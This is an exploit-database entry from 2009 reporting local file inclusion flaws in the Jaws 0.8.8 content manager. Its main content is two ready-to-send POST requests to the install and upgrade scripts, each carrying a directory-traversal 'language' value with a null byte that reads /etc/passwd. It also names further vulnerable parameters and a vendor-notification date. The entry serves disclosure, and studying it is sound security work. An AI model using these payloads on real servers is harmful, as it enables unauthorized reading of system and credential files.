[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities
# Published : 2009-02-04
# Author : fuzion
# Previous Title : txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
# Next Title : Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability
Jaws 0.8.8 Local File Inclusion
POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00
POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log
Author notified: Jan 24
# www.Syue.com [2009-02-04]